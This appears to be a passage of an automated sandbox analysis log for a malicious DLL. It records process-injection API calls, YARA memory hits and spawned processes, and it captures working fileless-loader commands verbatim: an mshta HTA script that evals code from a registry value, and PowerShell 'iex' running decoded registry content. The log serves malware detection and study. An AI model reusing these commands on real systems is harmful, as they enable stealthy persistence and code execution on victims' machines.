Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BA027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, | 0_2_009BA027 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, | 0_2_009C7AFF |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, | 0_2_009CAC94 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, | 0_2_009C6CBC |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, | 0_2_009BACD5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CCD7A NtQueryInformationProcess, | 0_2_009CCD7A |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B7E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, | 0_2_009B7E14 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C40A7 memset,NtQueryInformationProcess, | 0_2_009C40A7 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B7878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, | 0_2_009B7878 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, | 0_2_009D298D |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BAA15 NtQuerySystemInformation,RtlNtStatusToDosError, | 0_2_009BAA15 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C4C67 NtGetContextThread,RtlNtStatusToDosError, | 0_2_009C4C67 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B9DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, | 0_2_009B9DAC |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B45FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, | 0_2_009B45FF |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, | 0_2_009C956E |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, | 0_2_009C1606 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B37E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, | 0_2_009B37E7 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9E010 GetProcAddress,NtCreateSection,memset, | 1_2_00C9E010 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, | 1_2_00C9A027 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, | 1_2_00CA7AFF |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, | 1_2_00C9ACD5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CAAC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, | 1_2_00CAAC94 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA6CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, | 1_2_00CA6CBC |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C99DAC NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, | 1_2_00C99DAC |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CACD7A NtQueryInformationProcess, | 1_2_00CACD7A |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA7579 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, | 1_2_00CA7579 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C97E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, | 1_2_00C97E14 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C937E7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, | 1_2_00C937E7 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB47A1 NtMapViewOfSection, | 1_2_00CB47A1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA40A7 memset,NtQueryInformationProcess, | 1_2_00CA40A7 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C97878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, | 1_2_00C97878 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, | 1_2_00CB298D |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9AA15 NtQuerySystemInformation,RtlNtStatusToDosError, | 1_2_00C9AA15 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA4C67 NtGetContextThread,RtlNtStatusToDosError, | 1_2_00CA4C67 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C945FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, | 1_2_00C945FF |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, | 1_2_00CA956E |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA1606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, | 1_2_00CA1606 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C48AD | 0_2_009C48AD |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BD0DC | 0_2_009BD0DC |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CD057 | 0_2_009CD057 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D7188 | 0_2_009D7188 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B62FA | 0_2_009B62FA |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009BE384 | 0_2_009BE384 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009C8BF3 | 0_2_009C8BF3 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009B4C03 | 0_2_009B4C03 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CED4B | 0_2_009CED4B |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D3EAF | 0_2_009D3EAF |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009CD7BD | 0_2_009CD7BD |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9D0DC | 1_2_00C9D0DC |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA48AD | 1_2_00CA48AD |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CAD057 | 1_2_00CAD057 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB7188 | 1_2_00CB7188 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C962FA | 1_2_00C962FA |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CA8BF3 | 1_2_00CA8BF3 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C9E384 | 1_2_00C9E384 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00C94C03 | 1_2_00C94C03 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CAED4B | 1_2_00CAED4B |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB3EAF | 1_2_00CB3EAF |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CAD7BD | 1_2_00CAD7BD |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll' | |
Source: unknown | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1 | |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2 | |
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2 | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2 | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2 | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2 | |
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2 | |
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' | |
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) | |
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline' | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline' | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP' | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP' | |
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline' | |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\u8xtCk7fq8.dll',#1 | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: unknown unknown | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3728 CREDAT:17410 /prefetch:2 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17410 /prefetch:2 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17414 /prefetch:2 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17426 /prefetch:2 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17428 /prefetch:2 | Jump to behavior |
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2268 CREDAT:17440 /prefetch:2 | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline' | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline' | |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline' | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown | |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP' | |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP' | |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown | |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_029544C0 push ebp; mov dword ptr [esp], FFFF0000h | 0_2_029544C8 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_029544C0 push ebp; mov dword ptr [esp], 00000220h | 0_2_029544D5 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_029511F3 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx | 0_2_0295120F |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_029511F3 push dword ptr [ebp-10h]; mov dword ptr [esp], edi | 0_2_02951215 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_029511F3 push esi; mov dword ptr [esp], 00000003h | 0_2_02951260 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_029511F3 push edx; mov dword ptr [esp], 00F00000h | 0_2_02951269 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D7177 push ecx; ret | 0_2_009D7187 |
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_009D6E10 push ecx; ret | 0_2_009D6E19 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_044044C0 push ebp; mov dword ptr [esp], FFFF0000h | 1_2_044044C8 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_044044C0 push ebp; mov dword ptr [esp], 00000220h | 1_2_044044D5 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_044011F3 push dword ptr [ebp-08h]; mov dword ptr [esp], ecx | 1_2_0440120F |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_044011F3 push dword ptr [ebp-10h]; mov dword ptr [esp], edi | 1_2_04401215 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_044011F3 push esi; mov dword ptr [esp], 00000003h | 1_2_04401260 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_044011F3 push edx; mov dword ptr [esp], 00F00000h | 1_2_04401269 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB7177 push ecx; ret | 1_2_00CB7187 |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB1246 push cs; retf | 1_2_00CB124B |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB125E push cs; retf | 1_2_00CB125F |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB127E push cs; retf | 1_2_00CB127F |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_00CB6E10 push ecx; ret | 1_2_00CB6E19 |
Source: Yara match | File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY |
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX | |
Source: C:\Windows\System32\ |